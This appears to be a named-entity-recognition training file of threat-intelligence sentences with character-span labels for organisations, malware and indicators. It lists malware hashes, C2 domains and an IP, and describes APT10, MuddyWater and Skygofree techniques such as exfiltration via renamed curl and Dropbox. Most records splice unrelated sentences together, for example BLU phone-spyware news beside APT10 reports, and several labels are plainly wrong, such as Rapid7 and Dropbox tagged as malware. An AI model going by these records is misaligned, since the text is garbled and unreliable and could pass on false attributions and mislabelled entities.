Daserf : 04080fbab754dbf0c7529f8bbe661afef9c2cba74e3797428538ed5c243d705a .", "spans": [{"start": 139, "end": 163, "label": "Vulnerability"}, {"start": 166, "end": 172, "label": "Organization"}, {"start": 188, "end": 193, "label": "Organization"}, {"start": 218, "end": 230, "label": "Malware"}, {"start": 291, "end": 299, "label": "System"}, {"start": 411, "end": 417, "label": "Malware"}, {"start": 420, "end": 484, "label": "Indicator"}]} {"text": "It 's also raising eyebrows because of the connection with China , which has frequently sparred with the U.S. over cyber espionage . Rapid7 reviewed malware discovered in the victim\u2019s environment and found implants that used Dropbox as the C2 . Daserf : f8458a0711653071bf59a3153293771a6fb5d1de9af7ea814de58f473cba9d06 .", "spans": [{"start": 133, "end": 139, "label": "Organization"}, {"start": 225, "end": 232, "label": "Malware"}, {"start": 245, "end": 251, "label": "Malware"}, {"start": 254, "end": 318, "label": "Indicator"}]} {"text": "BLU Products has now updated its phones to remove the spying code , which most likely would have never been detected by regular users . The attackers used the same method of lateral movement by mounting the remote drive on a system , copying 1.bat to it , using task scheduler to execute the batch script , and finally , deleting the batch script . Daserf : e8edde4519763bb6669ba99e33b4803a7655805b8c3475b49af0a49913577e51 .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 140, "end": 149, "label": "Organization"}, {"start": 242, "end": 247, "label": "System"}, {"start": 349, "end": 355, "label": "Malware"}, {"start": 358, "end": 422, "label": "Indicator"}]} {"text": "The code never informed phone users that it was collecting that data , a behavior uniformly viewed by many as a serious security concern . 
APT10 used the same method of lateral movement by mounting the remote drive on a system , copying 1.bat to it , using task scheduler to execute the batch script , and finally , deleting the batch script . Daserf : 21111136d523970e27833dd2db15d7c50803d8f6f4f377d4d9602ba9fbd355cd .", "spans": [{"start": 139, "end": 144, "label": "Organization"}, {"start": 344, "end": 350, "label": "Malware"}, {"start": 353, "end": 417, "label": "Indicator"}]} {"text": "The developer of the code , Shanghai Adups Technology Co. , has apologized , contending that the code was intended for another one of its clients who requested better blocking of junk text messages and marketing calls . For exfiltration of stolen data , APT10 used WinRAR and renamed rar.exe to r.exe to create archives , upload them with curl.exe (renamed to c.exe , and again , use the cloud storage provider Dropbox . Daserf : 9c7a34390e92d4551c26a3feb5b181757b3309995acd1f92e0f63f888aa89423 .", "spans": [{"start": 28, "end": 57, "label": "Organization"}, {"start": 254, "end": 259, "label": "Organization"}, {"start": 265, "end": 271, "label": "System"}, {"start": 284, "end": 291, "label": "Malware"}, {"start": 295, "end": 300, "label": "Malware"}, {"start": 339, "end": 347, "label": "Malware"}, {"start": 360, "end": 365, "label": "Malware"}, {"start": 411, "end": 418, "label": "System"}, {"start": 421, "end": 427, "label": "Malware"}, {"start": 430, "end": 494, "label": "Indicator"}]} {"text": "Vulnerabilities Reported BLU Products , founded in 2009 , makes lower-end Android-powered smartphones that sell for as little as $ 50 on Amazon . Rapid7 discovered that additional data was placed into the Dropbox accounts under control of the attacker during the compromise and was able to attribute data that was placed into it as being owned by Visma . 
Invader : 0df20ccd074b722d5fe1358b329c7bdebcd7e3902a1ca4ca8d5a98cc5ce4c287 .", "spans": [{"start": 74, "end": 89, "label": "System"}, {"start": 137, "end": 143, "label": "Organization"}, {"start": 146, "end": 152, "label": "Organization"}, {"start": 243, "end": 251, "label": "Organization"}, {"start": 355, "end": 362, "label": "Malware"}, {"start": 365, "end": 429, "label": "Indicator"}]} {"text": "Like many original equipment manufacturers , it uses software components from other developers . Once on the Visma network , APT10 attackers used the Microsoft BITSAdmin CLI tool to copy malicious tools from a suspected attacker-controlled C2 hosted on 173.254.236[.]158 to the \\ProgramData\\temp\\ directory on the infected host . Invader : e9574627349aeb7dd7f5b9f9c5ede7faa06511d7fdf98804526ca1b2e7ce127e .", "spans": [{"start": 109, "end": 122, "label": "System"}, {"start": 125, "end": 130, "label": "Organization"}, {"start": 160, "end": 169, "label": "System"}, {"start": 330, "end": 337, "label": "Malware"}, {"start": 340, "end": 404, "label": "Indicator"}]} {"text": "The company uses a type of software from Adups that 's nicknamed FOTA , short for firmware over-the-air . Rapid7 then provided a breach notification to Visma to alert them to this compromise in September 2018 . Invader : 57e1d3122e6dc88d9eb2989f081de88a0e6864e767281d509ff58834928895fb . 9002 S-MAL:933d66b43b3ce9a572ee3127b255b4baf69d6fdd7cb24da609b52ee277baa76e . 9002 S-MAL:2bec20540d200758a223a7e8f7b2f98cd4949e106c1907d3f194216208c5b2fe . 
9002 S-MAL:055fe8002de293401852310ae76cb730c570f2037c3c832a52a79b70e2cb7831 .", "spans": [{"start": 41, "end": 46, "label": "Organization"}, {"start": 65, "end": 69, "label": "System"}, {"start": 106, "end": 112, "label": "Organization"}, {"start": 211, "end": 218, "label": "Malware"}, {"start": 221, "end": 285, "label": "Indicator"}, {"start": 288, "end": 363, "label": "Indicator"}, {"start": 366, "end": 441, "label": "Indicator"}, {"start": 444, "end": 519, "label": "Indicator"}]} {"text": "The software manages the delivery of firmware updates over-the-air , the term used for transmission via a mobile network . We believe APT10 is the most significant known Chinese state-sponsored cyber threat to global corporations . Minzen : 797d9c00022eaa2f86ddc9374f60d7ad92128ca07204b3e2fe791c08da9ce2b1 .", "spans": [{"start": 134, "end": 139, "label": "Organization"}, {"start": 232, "end": 238, "label": "Malware"}, {"start": 241, "end": 305, "label": "Indicator"}]} {"text": "Firmware is low-level code deep in an operating system that often has high access privileges , so it 's critical that it 's verified and contains no software vulnerabilities . APT10's unprecedented campaign against MSPs , alleged to have included some of the largest MSPs in the world , in order to conduct secondary attacks against their clients , grants the Chinese state the ability to potentially access the networks of hundreds (if not thousands) of corporations around the world . Minzen : 9374040a9e2f47f7037edaac19f21ff1ef6a999ff98c306504f89a37196074a2 .", "spans": [{"start": 176, "end": 183, "label": "Organization"}, {"start": 215, "end": 219, "label": "Organization"}, {"start": 487, "end": 493, "label": "Malware"}, {"start": 496, "end": 560, "label": "Indicator"}]} {"text": "Long before Kryptowire 's announcement , Tim Strazzere , a mobile security researcher with RedNaga Security , contacted BLU Products in March 2015 after he found two vulnerabilities that could be traced to Adup 's code . 
This campaign brings to light further evidence supporting the assertions made by the Five Eyes nations , led by the U.S Department of Justice indictment against APT10 actors outlining the unprecedented scale of economic cyberespionage being conducted by the Chinese Ministry of State Security . Minzen : 26727d139b593486237b975e7bdf93a8148c52d5fb48d5fe540a634a16a6ba82 .", "spans": [{"start": 12, "end": 22, "label": "Organization"}, {"start": 91, "end": 107, "label": "Organization"}, {"start": 206, "end": 210, "label": "Organization"}, {"start": 382, "end": 387, "label": "Organization"}, {"start": 432, "end": 440, "label": "Organization"}, {"start": 516, "end": 522, "label": "Malware"}, {"start": 525, "end": 589, "label": "Indicator"}]} {"text": "Those vulnerabilities could have enabled someone to gain broad access to an Android device . This report , alongside the plethora of other reporting on APT10 operations , acutely highlights the vulnerability of organizational supply chains . NamelessHdoor : dfc8a6da93481e9dab767c8b42e2ffbcd08fb813123c91b723a6e6d70196636f .", "spans": [{"start": 76, "end": 83, "label": "System"}, {"start": 152, "end": 157, "label": "Organization"}, {"start": 242, "end": 255, "label": "Malware"}, {"start": 258, "end": 322, "label": "Indicator"}]} {"text": "Strazzere 's colleague , Jon Sawyer , suggested on Twitter that the vulnerabilities might have not been there by mistake , but rather included as intentionally coded backdoors . We believe the groups moved to use CVE-2018-0798 instead of the other Microsoft Equation Editor Remote Code Execution (RCE) vulnerabilities because the former is more reliable as it works on all known versions of Equation Editor . 
Gh0stRAt Downloader : ce47e7827da145823a6f2b755975d1d2f5eda045b4c542c9b9d05544f3a9b974 .", "spans": [{"start": 51, "end": 58, "label": "Organization"}, {"start": 193, "end": 199, "label": "Organization"}, {"start": 213, "end": 226, "label": "Vulnerability"}, {"start": 409, "end": 428, "label": "Malware"}, {"start": 431, "end": 495, "label": "Indicator"}]} {"text": "He posted a tweet to The New York Times report , sarcastically writing , \" If only two people had called this company out for their backdoors several times over the last few years . The analyzed RTF files share the same object dimension (objw2180\\objh300) used to track the RTF weaponizer in our previous report , however , the sample was not exploiting CVE-2017-11882 or CVE-2018-0802 . Gh0stRAt Downloader : e34f4a9c598ad3bb243cb39969fb9509427ff9c08e63e8811ad26b72af046f0c .", "spans": [{"start": 25, "end": 39, "label": "Organization"}, {"start": 328, "end": 334, "label": "Malware"}, {"start": 354, "end": 368, "label": "Vulnerability"}, {"start": 372, "end": 385, "label": "Vulnerability"}, {"start": 388, "end": 407, "label": "Malware"}, {"start": 410, "end": 474, "label": "Indicator"}]} {"text": "'' Strazzere 's experience in trying to contact both vendors last year is typical of the frustrations frequently faced by security researchers . After further analysis , it was discovered that the RTF files were exploiting the CVE-2018-0798 vulnerability in Microsoft\u2019s Equation Editor (EQNEDT32) . Custom Gh0st : 8e5a0a5f733f62712b840e7f5051a2bd68508ea207e582a190c8947a06e26f40 .", "spans": [{"start": 197, "end": 206, "label": "Malware"}, {"start": 227, "end": 240, "label": "Vulnerability"}, {"start": 299, "end": 311, "label": "Malware"}, {"start": 314, "end": 378, "label": "Indicator"}]} {"text": "\" I tried reaching out to Adups and never heard back , '' Strazzere tells Information Security Media Group . 
Anomali Researchers were able to identify multiple samples of malicious RTF documents ITW using the same exploit for CVE-2018-0798 . Datper : 7d70d659c421b50604ce3e0a1bf423ab7e54b9df361360933bac3bb852a31849 .", "spans": [{"start": 26, "end": 31, "label": "Organization"}, {"start": 74, "end": 106, "label": "Organization"}, {"start": 109, "end": 116, "label": "Organization"}, {"start": 195, "end": 198, "label": "Malware"}, {"start": 226, "end": 239, "label": "Vulnerability"}, {"start": 242, "end": 248, "label": "Malware"}, {"start": 251, "end": 315, "label": "Indicator"}]} {"text": "\" BLU said they had no security department when I emailed them . The earliest use of the exploit ITW we were able to identify and confirm is a sample (e228045ef57fb8cc1226b62ada7eee9b) dating back to October 2018 (VirusTotal submission of 2018-10-29) with the RTF creation time 2018-10-23 . HomamDownloader : a624d2cd6dee3b6150df3ca61ee0f992e2d6b08b3107f5b00f8bf8bcfe07ebe7 .", "spans": [{"start": 2, "end": 5, "label": "Organization"}, {"start": 97, "end": 100, "label": "Malware"}, {"start": 260, "end": 263, "label": "Malware"}, {"start": 291, "end": 306, "label": "Malware"}, {"start": 309, "end": 373, "label": "Indicator"}]} {"text": "'' Strazzere says he also failed to reach MediaTek , a Taiwanese fabless semiconductor manufacturer whose chipsets that powered BLU phones also contained Adups software . CVE-2018-0798 is an RCE vulnerability , a stack buffer overflow that can be exploited by a threat actor to perform stack corruption . 
C2 : lywjrea.gmarketshop.net .", "spans": [{"start": 42, "end": 50, "label": "Organization"}, {"start": 128, "end": 131, "label": "Organization"}, {"start": 154, "end": 159, "label": "Organization"}, {"start": 171, "end": 184, "label": "Vulnerability"}, {"start": 262, "end": 274, "label": "Organization"}, {"start": 305, "end": 307, "label": "System"}, {"start": 310, "end": 333, "label": "Indicator"}]} {"text": "To their credit , both Google and Amazon appear to have put pressure on device manufacturers to fix their devices when flaws are found , Strazzere says . As observed previously with CVE-2017-11882 and CVE-2018-0802 , the weaponizer was used exclusively by Chinese cyber espionage actors for approximately one year December 2017 through December 2018 , after which cybercrime actors began to incorporate it in their malicious activity . C2 : krjregh.sacreeflame.com .", "spans": [{"start": 23, "end": 29, "label": "Organization"}, {"start": 34, "end": 40, "label": "Organization"}, {"start": 182, "end": 196, "label": "Vulnerability"}, {"start": 201, "end": 214, "label": "Vulnerability"}, {"start": 221, "end": 231, "label": "System"}, {"start": 280, "end": 286, "label": "Organization"}, {"start": 436, "end": 438, "label": "System"}, {"start": 441, "end": 464, "label": "Indicator"}]} {"text": "For Google , Android security issues - even if not in the core operating code - are a reputation threat , and for Amazon , a product quality issue . Upon decrypting and executing , it drops two additional files wsc_proxy.exe (legitimate Avast executable) and a malicious DLL wsc.dll in the %TEMP% folder . 
C2 : psfir.sacreeflame.com .", "spans": [{"start": 4, "end": 10, "label": "Organization"}, {"start": 114, "end": 120, "label": "Organization"}, {"start": 211, "end": 224, "label": "Malware"}, {"start": 275, "end": 282, "label": "Malware"}, {"start": 306, "end": 308, "label": "System"}, {"start": 311, "end": 332, "label": "Indicator"}]} {"text": "But devices sold outside of Amazon \" might not have ever seen fixes , '' he says . However , Beginning on 25 June 2019 , we started observing multiple commodity campaigns Mostly dropping AsyncRAT using the updated RTF weaponizer with the same exploit (CVE-2018-0798) . C2 : lywja.healthsvsolu.com .", "spans": [{"start": 28, "end": 34, "label": "Organization"}, {"start": 121, "end": 123, "label": "Organization"}, {"start": 187, "end": 195, "label": "Malware"}, {"start": 269, "end": 271, "label": "System"}, {"start": 274, "end": 296, "label": "Indicator"}]} {"text": "Officials at BLU could n't be immediately reached for comment . Analysis of the Royal Road weaponizer has resulted in the discovery that multiple Chinese threat groups started utilizing CVE-2018-0798 in their RTF weaponizer . C2 : phot.healthsvsolu.com .", "spans": [{"start": 13, "end": 16, "label": "Organization"}, {"start": 154, "end": 167, "label": "Organization"}, {"start": 186, "end": 199, "label": "Vulnerability"}, {"start": 209, "end": 223, "label": "System"}, {"start": 226, "end": 228, "label": "System"}, {"start": 231, "end": 252, "label": "Indicator"}]} {"text": "Attitude Change The disinterest in the issues appears to have changed with The New York Times report , which lit a fire underneath Adups and BLU . These findings also suggest that the threat groups have robust exploit developing capabilities because CVE-2018-0798 is not widely reported on and it is typically not incorporated into publicly available weaponizers . 
C2 : blog.softfix.co.kr .", "spans": [{"start": 79, "end": 93, "label": "Organization"}, {"start": 131, "end": 136, "label": "Organization"}, {"start": 141, "end": 144, "label": "Organization"}, {"start": 184, "end": 197, "label": "Organization"}, {"start": 250, "end": 263, "label": "Vulnerability"}, {"start": 365, "end": 367, "label": "System"}, {"start": 370, "end": 388, "label": "Indicator"}]} {"text": "Adups addressed the issue in a Nov. 16 news release , writing that some products made by BLU were updated in June with a version of its FOTA that had actually been intended for other clients who had requested an ability to stop text spam . In addition , a current ANY.RUN playback of our observed Elise infection is also available . C2 : news.softfix.co.kr .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 89, "end": 92, "label": "Organization"}, {"start": 136, "end": 140, "label": "System"}, {"start": 264, "end": 271, "label": "Malware"}, {"start": 297, "end": 302, "label": "Malware"}, {"start": 333, "end": 335, "label": "System"}, {"start": 338, "end": 356, "label": "Indicator"}]} {"text": "That version flags messages \" containing certain language associated with junk texts and flags numbers associated with junk calls and not in a user 's contacts , '' the company says . Upon opening of the MS Word document , our embedded file exploits CVE-2017-11882 to drop a malicious fake Norton Security Shell Extension module , 'NavShExt.dll' , which is then injected into iexplore.exe to install the backdoor , begin collection , and activate command and control . C2 : www.gokickes.com .", "spans": [{"start": 250, "end": 264, "label": "Vulnerability"}, {"start": 331, "end": 345, "label": "Malware"}, {"start": 376, "end": 388, "label": "Malware"}, {"start": 469, "end": 471, "label": "System"}, {"start": 474, "end": 490, "label": "Indicator"}]} {"text": "Manufacturers should be keeping close tabs on what software ends up on their devices . 
Moving through the infection process , NetWitness Endpoint detects the initial exploit CVE-2017-1182 in action as the Microsoft Equation Editor , EQNEDT32.exe , scores high for potentially malicious activity . C2 : log.gokickes.com .", "spans": [{"start": 174, "end": 187, "label": "Vulnerability"}, {"start": 205, "end": 230, "label": "Malware"}, {"start": 233, "end": 245, "label": "Malware"}, {"start": 297, "end": 299, "label": "System"}, {"start": 302, "end": 318, "label": "Indicator"}]} {"text": "But it would appear that BLU only took action after Kryptowire notified it along with Google , Adups and Amazon . Most recently though , a new campaign , targeting Belarus , Turkey and Ukraine , has emerged that caught the attention of Check Point researchers . The group is responsible for the campaign known as Operation Wilted Tulip .", "spans": [{"start": 25, "end": 28, "label": "Organization"}, {"start": 52, "end": 62, "label": "Organization"}, {"start": 86, "end": 92, "label": "Organization"}, {"start": 95, "end": 100, "label": "Organization"}, {"start": 105, "end": 111, "label": "Organization"}, {"start": 236, "end": 247, "label": "Organization"}]} {"text": "\" When BLU raised objections , Adups took immediate measures to disable that functionality on BLU phones , '' Adups says . The well-crafted and socially engineered malicious documents then become the \ufb01rst stage of a long and mainly \ufb01leless infection chain that eventually delivers POWERSTATS , a signature PowerShell backdoor of this threat group . 
Dark Caracal is threat group that has been attributed to the Lebanese General Directorate of General Security ( GDGS ) and has operated since at least 2012 .", "spans": [{"start": 7, "end": 10, "label": "Organization"}, {"start": 31, "end": 36, "label": "Organization"}, {"start": 94, "end": 97, "label": "Organization"}, {"start": 281, "end": 291, "label": "Malware"}, {"start": 306, "end": 325, "label": "Malware"}, {"start": 334, "end": 346, "label": "Organization"}, {"start": 349, "end": 361, "label": "Organization"}, {"start": 419, "end": 458, "label": "Organization"}, {"start": 461, "end": 465, "label": "Organization"}]} {"text": "The greater worry is that these situations may sometimes not be simple mistakes . This powerful backdoor can receive commands from the attackers , enabling it to ex\ufb01ltrate \ufb01les from the system it is running on , execute additional scripts , delete \ufb01les , and more . Darkhotel is a threat group that has been active since at least 2004 .", "spans": [{"start": 96, "end": 104, "label": "Malware"}, {"start": 162, "end": 176, "label": "Malware"}, {"start": 212, "end": 238, "label": "Malware"}, {"start": 241, "end": 252, "label": "Malware"}, {"start": 266, "end": 275, "label": "Organization"}]} {"text": "Security experts have long warned of the ability of advanced adversaries to subvert hardware and software supply chains . If the macros in SPK KANUN DE\u011e\u0130\u015e\u0130KL\u0130\u011e\u0130 G\u0130B G\u00d6R\u00dc\u015e\u00dc.doc\u201d are enabled , an embedded payload is decoded and saved in the %APPDATA% directory with the name CiscoAny.exe . 
The group has conducted activity on hotel and business center Wi\u2011Fi and physical connections as well as peer-to-peer and file sharing networks .", "spans": [{"start": 139, "end": 148, "label": "Malware"}, {"start": 273, "end": 285, "label": "Malware"}]} {"text": "Also , the software vulnerabilities pointed out in the FOTA software by Strazzere in 2015 could have been taken advantage of by cybercriminals looking to steal bank account details or execute other frauds . INF \ufb01les have been used in the past by MuddyWater , although they were launched using Advpack.dll and not IEAdvpack.dll . The actors have also conducted spearphishing .", "spans": [{"start": 11, "end": 35, "label": "Vulnerability"}, {"start": 55, "end": 59, "label": "System"}, {"start": 207, "end": 215, "label": "System"}, {"start": 246, "end": 256, "label": "Organization"}, {"start": 293, "end": 304, "label": "System"}, {"start": 313, "end": 326, "label": "System"}]} {"text": "Strazzere advises that consumers should look at the pedigree of mobile manufacturers and take a close look at their security track record before making a decision on what device to buy . In addition , by using VBA2Graph , we were able to visualize the VBA call graph in the macros of each document . Unknown .", "spans": [{"start": 210, "end": 219, "label": "Malware"}, {"start": 256, "end": 266, "label": "Malware"}]} {"text": "\" In the end , the consumer needs to vote with their wallet , '' he says . Although it has focused most of its efforts on the Middle East region , the political af\ufb01liations , motives and purposes behind MuddyWater\u2019s attacks are not very well- de\ufb01ned , thus earning it its name . 
Charming Kitten is an Iranian cyber espionage group that has been active since approximately 2014 .", "spans": [{"start": 203, "end": 215, "label": "Organization"}, {"start": 279, "end": 294, "label": "Organization"}]} {"text": "Skygofree : Following in the footsteps of HackingTeam 16 JAN 2018 At the beginning of October 2017 , we discovered new Android spyware with several features previously unseen in the wild . In the past , countries such as Saudi Arabia , the UAE and Turkey have been a MuddyWater's main target , but the campaigns have also reached a much wider audience , making their way to victims in countries such as Belarus and Ukraine . They appear to focus on targeting individuals of interest to Iran who work in academic research , human rights , and media , with most victims having been located in Iran , the US , Israel , and the UK .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 42, "end": 53, "label": "Organization"}, {"start": 119, "end": 126, "label": "System"}, {"start": 267, "end": 279, "label": "Organization"}]} {"text": "In the course of further research , we found a number of related samples that point to a long-term development process . MuddyWater target groups across Middle East and Central Asia , primarily using spear phishing emails with malicious attachments . Charming Kitten usually tries to access private email and Facebook accounts , and sometimes establishes a foothold on victim computers as a secondary objective .", "spans": [{"start": 121, "end": 131, "label": "Organization"}, {"start": 251, "end": 266, "label": "Organization"}, {"start": 299, "end": 304, "label": "System"}, {"start": 309, "end": 317, "label": "Organization"}]} {"text": "We believe the initial versions of this malware were created at least three years ago \u2013 at the end of 2014 . Most recently MuddyWater were connected to a campaign in March that targeted organizations in Turkey , Pakistan , and Tajikistan . 
The group 's TTPs overlap extensively with another group , Magic Hound , resulting in reporting that may not distinguish between the two groups' activities .", "spans": [{"start": 123, "end": 133, "label": "Organization"}, {"start": 299, "end": 310, "label": "Organization"}]} {"text": "Since then , the implant \u2019 s functionality has been improving and remarkable new features implemented , such as the ability to record audio surroundings via the microphone when an infected device is in a specified location ; the stealing of WhatsApp messages via Accessibility Services ; and the ability to connect an infected device to Wi-Fi networks controlled by cybercriminals . The group has been quite visible since the initial 2017 Malwarebytes report on their elaborate espionage attack against the Saudi Arabian government . Cleaver : Threat Group 2889 , TG-2889 .", "spans": [{"start": 241, "end": 249, "label": "System"}, {"start": 387, "end": 392, "label": "Organization"}, {"start": 534, "end": 541, "label": "Organization"}, {"start": 544, "end": 561, "label": "Organization"}, {"start": 564, "end": 571, "label": "Organization"}]} {"text": "We observed many web landing pages that mimic the sites of mobile operators and which are used to spread the Android implants . Our analysis revealed that they drop a new backdoor , which is written in PowerShell as MuddyWater\u2019s known POWERSTATS backdoor . Cleaver is a threat group that has been attributed to Iranian actors and is responsible for activity tracked as Operation Cleaver .", "spans": [{"start": 109, "end": 116, "label": "System"}, {"start": 216, "end": 228, "label": "Organization"}, {"start": 235, "end": 254, "label": "System"}, {"start": 257, "end": 264, "label": "Organization"}]} {"text": "These domains have been registered by the attackers since 2015 . We assume that RunPow stands for run PowerShell , \u201d and triggers the PowerShell code embedded inside the .dll file . 
Strong circumstantial evidence suggests Cleaver is linked to Threat Group 2889 ( TG-2889 ) .", "spans": [{"start": 102, "end": 112, "label": "Malware"}, {"start": 170, "end": 179, "label": "Malware"}, {"start": 222, "end": 229, "label": "Organization"}, {"start": 243, "end": 260, "label": "Organization"}, {"start": 263, "end": 270, "label": "Organization"}]} {"text": "According to our telemetry , that was the year the distribution campaign was at its most active . This backdoor has some features similar to a previously discovered version of the Muddywater backdoor . Cobalt Group : Cobalt Gang , Cobalt Spider .", "spans": [{"start": 103, "end": 111, "label": "System"}, {"start": 180, "end": 190, "label": "Organization"}, {"start": 202, "end": 214, "label": "Organization"}, {"start": 217, "end": 228, "label": "Organization"}, {"start": 231, "end": 244, "label": "Organization"}]} {"text": "The activities continue : the most recently observed domain was registered on October 31 , 2017 . Based on our analysis , we can confirm that MuddyWater target Turkish government organizations related to the finance and energy sectors . Cobalt Group is a financially motivated threat group that has primarily targeted financial institutions .", "spans": [{"start": 142, "end": 152, "label": "Organization"}, {"start": 160, "end": 192, "label": "Organization"}, {"start": 208, "end": 215, "label": "Organization"}, {"start": 220, "end": 226, "label": "Organization"}, {"start": 237, "end": 249, "label": "Organization"}]} {"text": "Based on our KSN statistics , there are several infected individuals , exclusively in Italy . This is yet another similarity with previous MuddyWater campaigns , which were known to have targeted multiple Turkish government entities . 
The group has conducted intrusions to steal money via targeting ATM systems , card processing , payment systems and SWIFT systems .", "spans": [{"start": 139, "end": 149, "label": "Organization"}, {"start": 299, "end": 310, "label": "System"}, {"start": 331, "end": 346, "label": "System"}, {"start": 351, "end": 364, "label": "System"}]} {"text": "Moreover , as we dived deeper into the investigation , we discovered several spyware tools for Windows that form an implant for exfiltrating sensitive data on a targeted machine . The main delivery method of this type of backdoor is spear phishing emails or spam that uses social engineering to manipulate targets into enabling malicious documents . Cobalt Group has mainly targeted banks in Eastern Europe , Central Asia , and Southeast Asia .", "spans": [{"start": 95, "end": 102, "label": "System"}, {"start": 221, "end": 229, "label": "Malware"}, {"start": 350, "end": 362, "label": "Organization"}]} {"text": "The version we found was built at the beginning of 2017 , and at the moment we are not sure whether this implant has been used in the wild . Trend Micro\u2122 Deep Discovery\u2122 provides detection , in-depth analysis , and proactive response to today\u2019s stealthy malware , and targeted attacks in real time . One of the alleged leaders was arrested in Spain in early 2018 , but the group still appears to be active .", "spans": [{"start": 141, "end": 153, "label": "Organization"}, {"start": 277, "end": 284, "label": "Organization"}]} {"text": "We named the malware Skygofree , because we found the word in one of the domains * . MuddyWater first surfaced in 2017 . 
The group has been known to target organizations in order to use their access to then compromise additional victims .", "spans": [{"start": 21, "end": 30, "label": "Malware"}, {"start": 85, "end": 95, "label": "Organization"}]} {"text": "Malware Features Android According to the observed samples and their signatures , early versions of this Android malware were developed by the end of 2014 and the campaign has remained active ever since . First stage infections and graphical decoys have been described by multiple sources , including in our previous research MuddyWater expands operations . Reporting indicates there may be links between Cobalt Group and both the malware Carbanak and the group Carbanak .", "spans": [{"start": 17, "end": 24, "label": "System"}, {"start": 105, "end": 112, "label": "System"}, {"start": 326, "end": 336, "label": "Organization"}, {"start": 405, "end": 417, "label": "Organization"}, {"start": 439, "end": 447, "label": "Malware"}, {"start": 462, "end": 470, "label": "Organization"}]} {"text": "The code and functionality have changed numerous times ; from simple unobfuscated malware at the beginning to sophisticated multi-stage spyware that gives attackers full remote control of the infected device . MuddyWater compiles various offensive Python scripts . Taidoor is a threat group that has operated since at least 2009 and has primarily targeted the Taiwanese government .", "spans": [{"start": 210, "end": 220, "label": "Organization"}, {"start": 248, "end": 254, "label": "System"}, {"start": 255, "end": 262, "label": "System"}, {"start": 265, "end": 272, "label": "Organization"}, {"start": 360, "end": 380, "label": "Organization"}]} {"text": "We have examined all the detected versions , including the latest one that is signed by a certificate valid from September 14 , 2017 . This includes Python scripts . 
TEMP.Veles \uff1a XENOTIME .", "spans": [{"start": 166, "end": 176, "label": "Organization"}, {"start": 179, "end": 187, "label": "Organization"}]} {"text": "The implant provides the ability to grab a lot of exfiltrated data , like call records , text messages , geolocation , surrounding audio , calendar events , and other memory information stored on the device . Usually , the Stageless Meterpreter has the Ext_server_stdapi.x64.dll\u201d , Ext_server_extapi.x64.dll\u201d , and Ext_server_espia.x64.dll\u201d extensions . TEMP.Veles is a Russia based threat group that has targeted critical infrastructure .", "spans": [{"start": 223, "end": 244, "label": "Malware"}, {"start": 253, "end": 279, "label": "Malware"}, {"start": 282, "end": 308, "label": "Malware"}, {"start": 315, "end": 340, "label": "Malware"}, {"start": 354, "end": 364, "label": "Organization"}]} {"text": "After manual launch , it shows a fake welcome notification to the user : Dear Customer , we \u2019 re updating your configuration and it will be ready as soon as possible . The January 2017 report followed up on other private reports published on the group\u2019s BeEF-related activity in 2015 and 2016 . The group has been observed utilizing TRITON , a malware framework designed to manipulate industrial safety systems .", "spans": [{"start": 254, "end": 266, "label": "Organization"}, {"start": 333, "end": 339, "label": "Malware"}]} {"text": "At the same time , it hides an icon and starts background services to hide further actions from the user . Previous analysis of the NewsBeef APT indicates that the group focuses on Saudi Arabian (SA) and Western targets , and lacks advanced offensive technology development capabilities . 
The White Company is a likely state-sponsored threat actor with advanced capabilities .", "spans": [{"start": 132, "end": 140, "label": "Organization"}, {"start": 289, "end": 306, "label": "Organization"}]} {"text": "Service Name Purpose AndroidAlarmManager Uploading last recorded .amr audio AndroidSystemService Audio recording AndroidSystemQueues Location tracking with movement detection ClearSystems GSM tracking ( CID , LAC , PSC ) ClipService Clipboard stealing AndroidFileManager Uploading all exfiltrated data AndroidPush XMPP \u0421 & C protocol ( url.plus:5223 ) RegistrationService Registration on C & C via HTTP ( url.plus/app/pro/ ) Interestingly , a self-protection feature was implemented in almost every service However , in the summer of 2016 , NewsBeef deployed a new toolset that includes macro-enabled Office documents , PowerSploit , and the Pupy backdoor . From 2017 through 2018 , the group led an espionage campaign called Operation Shaheen targeting government and military organizations in Pakistan .", "spans": [{"start": 188, "end": 191, "label": "System"}, {"start": 336, "end": 349, "label": "Indicator"}, {"start": 405, "end": 422, "label": "Indicator"}, {"start": 541, "end": 549, "label": "Organization"}, {"start": 587, "end": 617, "label": "System"}, {"start": 620, "end": 631, "label": "System"}, {"start": 642, "end": 655, "label": "System"}, {"start": 754, "end": 764, "label": "Organization"}, {"start": 769, "end": 791, "label": "Organization"}]} {"text": ". The most recent NewsBeef campaign uses this toolset in conjunction with spearphishing emails , links sent over social media/standalone private messaging applications , and watering hole attacks that leverage compromised high-profile websites some belonging to the SA government . 
Molerats : Operation Molerats , Gaza Cybergang .", "spans": [{"start": 18, "end": 26, "label": "Organization"}, {"start": 282, "end": 290, "label": "Organization"}, {"start": 293, "end": 311, "label": "Organization"}, {"start": 314, "end": 328, "label": "Organization"}]} {"text": "Since in Android 8.0 ( SDK API 26 ) the system is able to kill idle services , this code raises a fake update notification to prevent it : Cybercriminals have the ability to control the implant via HTTP , XMPP , binary SMS and FirebaseCloudMessaging ( or GoogleCloudMessaging in older versions ) protocols . The NewsBeef actor deployed a new toolset in a campaign that focused primarily on Saudi Arabian targets . Molerats is a politically-motivated threat group that has been operating since 2012 .", "spans": [{"start": 9, "end": 20, "label": "System"}, {"start": 312, "end": 320, "label": "Organization"}, {"start": 414, "end": 422, "label": "Organization"}]} {"text": "Such a diversity of protocols gives the attackers more flexible control . NewsBeef continues to deploy malicious macro-enabled Office documents , poisoned legitimate Flash and Chrome installers , PowerSploit , and Pupy tools . The group 's victims have primarily been in the Middle East , Europe , and the United States .", "spans": [{"start": 74, "end": 82, "label": "Organization"}, {"start": 166, "end": 171, "label": "System"}, {"start": 176, "end": 193, "label": "System"}, {"start": 196, "end": 207, "label": "System"}, {"start": 214, "end": 224, "label": "System"}]} {"text": "In the latest implant versions there are 48 different commands . The NewsBeef campaign is divided into two main attack vectors , spearphishing and strategic web compromise watering hole attacks . 
